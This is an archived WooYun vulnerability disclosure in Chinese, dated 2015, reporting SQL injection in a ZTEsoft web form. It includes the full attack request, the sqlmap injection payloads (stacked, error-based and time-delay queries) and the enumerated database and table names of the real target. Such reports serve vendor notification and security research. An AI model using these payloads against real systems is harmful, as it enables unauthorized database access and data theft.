乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-03-23: 细节已通知厂商并且等待厂商处理中 2015-03-23: 厂商已经确认,细节仅向厂商公开 2015-04-02: 细节向核心白帽子及相关领域专家公开 2015-04-12: 细节向普通白帽子公开 2015-04-22: 细节向实习白帽子公开 2015-05-07: 细节向公众公开
http://www.ztesoft.com:18085/sq/emailcheck.aspx
中兴软创某接口,SQL注入:
POST /sq/emailcheck.aspx HTTP/1.1Content-Length: 369Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: http://www.ztesoft.com:18085/Cookie: ASP.NET_SessionId=sjtfsve1a3lq5a555vnfok45Host: www.ztesoft.com:18085Connection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36Accept: */*Button1=Submit&TextBox1=1&__VIEWSTATE=dDwxNjY3MDE2MTI4O3Q8O2w8aTwxPjs%2bO2w8dDw7bDxpPDE3Pjs%2bO2w8dDxwPHA8bDxOYXZpZ2F0ZVVybDs%2bO2w8bWFpbHRvOnh1LmR1b0B6dGUuY29tLmNuP3N1YmplY3Q9SSB3YW50IHRvIGpvaW4gdGhlIHNhdGlzZmFjdGlvbiBxdWVzdGlvbm5haXJlOz4%2bOz47Oz47Pj47Pj47Pndu%2bHogmyqqjAlTGkBPicUQLlMs&__VIEWSTATEGENERATOR=4607DA12
TextBox1参数
14个库:
sqlmap identified the following injection points with a total of 728 HTTP(s) requests:---Place: POSTParameter: TextBox1 Type: boolean-based blind Title: Microsoft SQL Server/Sybase stacked conditional-error blind queries Payload: Button1=Submit&TextBox1=1'; IF(9302=9302) SELECT 9302 ELSE DROP FUNCTION aNqw--&__VIEWSTATE=dDwxNjY3MDE2MTI4O3Q8O2w8aTwxPjs+O2w8dDw7bDxpPDExPjtpPDE3Pjs+O2w8dDxwPHA8bDxUZXh0Oz47bDxTb3JyeSx0aGUgZW1haWwgZG9lc24ndCBleGlzdCE7Pj47Pjs7Pjt0PHA8cDxsPFRleHQ7TmF2aWdhdGVVcmw7PjtsPGhlcmUuO21haWx0bzp4dS5kdW9AenRlLmNvbS5jbj9zdWJqZWN0PUkgd2FudCB0byBqb2luIHRoZSBzYXRpc2ZhY3Rpb24gcXVlc3Rpb25uYWlyZTs+Pjs+Ozs+Oz4+Oz4+Oz4Ew/IvDbOOr+zt90lfyLuwIUVjug==&__VIEWSTATEGENERATOR=4607DA12 Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: Button1=Submit&TextBox1=1'; WAITFOR DELAY '0:0:5'--&__VIEWSTATE=dDwxNjY3MDE2MTI4O3Q8O2w8aTwxPjs+O2w8dDw7bDxpPDExPjtpPDE3Pjs+O2w8dDxwPHA8bDxUZXh0Oz47bDxTb3JyeSx0aGUgZW1haWwgZG9lc24ndCBleGlzdCE7Pj47Pjs7Pjt0PHA8cDxsPFRleHQ7TmF2aWdhdGVVcmw7PjtsPGhlcmUuO21haWx0bzp4dS5kdW9AenRlLmNvbS5jbj9zdWJqZWN0PUkgd2FudCB0byBqb2luIHRoZSBzYXRpc2ZhY3Rpb24gcXVlc3Rpb25uYWlyZTs+Pjs+Ozs+Oz4+Oz4+Oz4Ew/IvDbOOr+zt90lfyLuwIUVjug==&__VIEWSTATEGENERATOR=4607DA12 Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: Button1=Submit&TextBox1=1' WAITFOR DELAY '0:0:5'--&__VIEWSTATE=dDwxNjY3MDE2MTI4O3Q8O2w8aTwxPjs+O2w8dDw7bDxpPDExPjtpPDE3Pjs+O2w8dDxwPHA8bDxUZXh0Oz47bDxTb3JyeSx0aGUgZW1haWwgZG9lc24ndCBleGlzdCE7Pj47Pjs7Pjt0PHA8cDxsPFRleHQ7TmF2aWdhdGVVcmw7PjtsPGhlcmUuO21haWx0bzp4dS5kdW9AenRlLmNvbS5jbj9zdWJqZWN0PUkgd2FudCB0byBqb2luIHRoZSBzYXRpc2ZhY3Rpb24gcXVlc3Rpb25uYWlyZTs+Pjs+Ozs+Oz4+Oz4+Oz4Ew/IvDbOOr+zt90lfyLuwIUVjug==&__VIEWSTATEGENERATOR=4607DA12---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 1.1.4322back-end DBMS: Microsoft SQL Server 2005available databases [14]:[*] cot_bsn[*] FAQDB[*] lumigent[*] LumigentDemoDB[*] master[*] model[*] msdb[*] ReportServer[*] ReportServerTempDB[*] TekRADIUS[*] tempdb[*] urtracker[*] urtracker_bsn[*] urtracker_ccb
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: POSTParameter: TextBox1 Type: boolean-based blind Title: Microsoft SQL Server/Sybase stacked conditional-error blind queries Payload: Button1=Submit&TextBox1=1'; IF(9302=9302) SELECT 9302 ELSE DROP FUNCTION aNqw--&__VIEWSTATE=dDwxNjY3MDE2MTI4O3Q8O2w8aTwxPjs+O2w8dDw7bDxpPDExPjtpPDE3Pjs+O2w8dDxwPHA8bDxUZXh0Oz47bDxTb3JyeSx0aGUgZW1haWwgZG9lc24ndCBleGlzdCE7Pj47Pjs7Pjt0PHA8cDxsPFRleHQ7TmF2aWdhdGVVcmw7PjtsPGhlcmUuO21haWx0bzp4dS5kdW9AenRlLmNvbS5jbj9zdWJqZWN0PUkgd2FudCB0byBqb2luIHRoZSBzYXRpc2ZhY3Rpb24gcXVlc3Rpb25uYWlyZTs+Pjs+Ozs+Oz4+Oz4+Oz4Ew/IvDbOOr+zt90lfyLuwIUVjug==&__VIEWSTATEGENERATOR=4607DA12 Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: Button1=Submit&TextBox1=1'; WAITFOR DELAY '0:0:5'--&__VIEWSTATE=dDwxNjY3MDE2MTI4O3Q8O2w8aTwxPjs+O2w8dDw7bDxpPDExPjtpPDE3Pjs+O2w8dDxwPHA8bDxUZXh0Oz47bDxTb3JyeSx0aGUgZW1haWwgZG9lc24ndCBleGlzdCE7Pj47Pjs7Pjt0PHA8cDxsPFRleHQ7TmF2aWdhdGVVcmw7PjtsPGhlcmUuO21haWx0bzp4dS5kdW9AenRlLmNvbS5jbj9zdWJqZWN0PUkgd2FudCB0byBqb2luIHRoZSBzYXRpc2ZhY3Rpb24gcXVlc3Rpb25uYWlyZTs+Pjs+Ozs+Oz4+Oz4+Oz4Ew/IvDbOOr+zt90lfyLuwIUVjug==&__VIEWSTATEGENERATOR=4607DA12 Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: Button1=Submit&TextBox1=1' WAITFOR DELAY '0:0:5'--&__VIEWSTATE=dDwxNjY3MDE2MTI4O3Q8O2w8aTwxPjs+O2w8dDw7bDxpPDExPjtpPDE3Pjs+O2w8dDxwPHA8bDxUZXh0Oz47bDxTb3JyeSx0aGUgZW1haWwgZG9lc24ndCBleGlzdCE7Pj47Pjs7Pjt0PHA8cDxsPFRleHQ7TmF2aWdhdGVVcmw7PjtsPGhlcmUuO21haWx0bzp4dS5kdW9AenRlLmNvbS5jbj9zdWJqZWN0PUkgd2FudCB0byBqb2luIHRoZSBzYXRpc2ZhY3Rpb24gcXVlc3Rpb25uYWlyZTs+Pjs+Ozs+Oz4+Oz4+Oz4Ew/IvDbOOr+zt90lfyLuwIUVjug==&__VIEWSTATEGENERATOR=4607DA12---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 1.1.4322back-end DBMS: Microsoft SQL Server 2005Database: cot_bsn[101 tables]+-----------------------------------+| Accounts_AccessListItems || Accounts_AccessLists || Accounts_Department || Accounts_PermissionCategories || Accounts_Permissions || Accounts_RolePermissions || Accounts_Roles || Accounts_UserRoles || Accounts_UserState || Accounts_Users || Common_Config || Kb_ArticleAttachments || Kb_ArticleComment || Kb_Articles || Kb_Categories || PROBLEMCatalogGroup || Pts_DbDirectory || Pts_FilterNodes || Pts_Filters || Pts_GlobalSelectValues || Pts_GlobalSelects || Pts_ProblemAttachments || Pts_ProblemCatalogs || Pts_ProblemFields || Pts_ProblemHistory || Pts_ProblemInitStateWorkgroup || Pts_ProblemPriority || Pts_ProblemRelations || Pts_ProblemSeverity || Pts_ProblemShiftHistory || Pts_ProblemState || Pts_ProblemStateRecord || Pts_ProblemStateTimeLimit || Pts_ProblemStateTransfer || Pts_ProblemStateTransferWorkgroup || Pts_ProblemType || Pts_ProblemVisitHistory || Pts_Problems || Pts_ProjectCatalogs || Pts_ProjectStates || Pts_ProjectTempletDbDirectory || Pts_ProjectTemplets || Pts_Projects || Pts_RecordAttachments || Pts_Records || Pts_StateEditableFields || Pts_Version || Pts_WorkgroupUsers || Pts_Workgroups || TestGroup_Notify || Test_Env || TransFile_OCSEnv || Transfile_Environment || Transfile_Environment_Extend || Transfile_Environment_Extend_TEMP || Transfile_Environment_TEMP || Transfile_Environment_Web || Transfile_Environment_Web_TEMP || Transfile_Environment_bak || Transfile_Param || Transfile_URInfo || Transfile_VersionUpdate_Server || Transfile_Version_Num_Map || UR_TASK_PLAN || UR_TO_Project_Config || auto_testcase || bsnuser || ccb_state_type || dtproperties || holiday || office_contact || problem_user || pts_RecordType || tester || v_Accounts_Permissions || v_Accounts_Users || v_ExceedStat_no1 || v_Kb_ArticleList || v_Pts_ProblemAttachments || v_Pts_ProblemHistory || v_Pts_ProblemStateRecord || v_Pts_ProblemVisitHistory || v_Pts_Problems || v_Pts_ProblemsExceedStat || v_Pts_ProblemsFinishedExceedStat || v_Pts_ProblemsPutOffStat || v_Pts_ProblemsWithRecords || v_Pts_Projects || v_Pts_RecordAttachments || v_Pts_Records || v_Pts_UserWorkgroups || v_Pts_stat_StateKeepTime || v_QQ_QUERY || version_batch_control || version_info || version_plan || version_plan_log || webbuild_log || webbuild_server || pubuser.bsnuser_bak || pubuser.dy_test |+-----------------------------------+
不深入了~
危害等级:高
漏洞Rank:13
确认时间:2015-03-23 13:56
感谢~
暂无